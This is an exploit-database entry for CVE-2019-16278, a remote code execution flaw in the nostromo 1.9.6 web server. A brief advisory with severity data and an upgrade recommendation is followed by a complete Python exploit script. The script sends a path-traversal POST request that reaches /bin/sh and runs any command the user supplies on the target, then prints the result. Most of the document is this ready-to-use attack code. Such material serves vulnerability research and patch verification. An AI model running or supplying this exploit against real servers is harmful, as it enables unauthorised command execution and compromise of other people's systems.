nostromo 1.9.6 - Remote Code Execution

vendor:

nostromo

by:

Kr0ff

9.8

CVSS

CRITICAL

Remote Code Execution

CWE

Product Name: nostromo

Affected Version From: 1.9.6

Affected Version To: 1.9.6

Patch Exists: YES

Related CWE: CVE-2019-16278

CPE: nostromo:nhttpd

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Debian

2019

nostromo 1.9.6 – Remote Code Execution

A vulnerability in nostromo 1.9.6 allows remote code execution. The vulnerability is due to a lack of proper input validation in the http_verify function in nostromo nhttpd.c. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. Successful exploitation of this vulnerability can result in remote code execution.

Mitigation:

Upgrade to the latest version of nostromo 1.9.7 or later.

Source

Exploit-DB raw data:

# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

cve2019_16278.py

#!/usr/bin/env python

import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)
    
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)
   
    except IndexError:
        print(help_menu)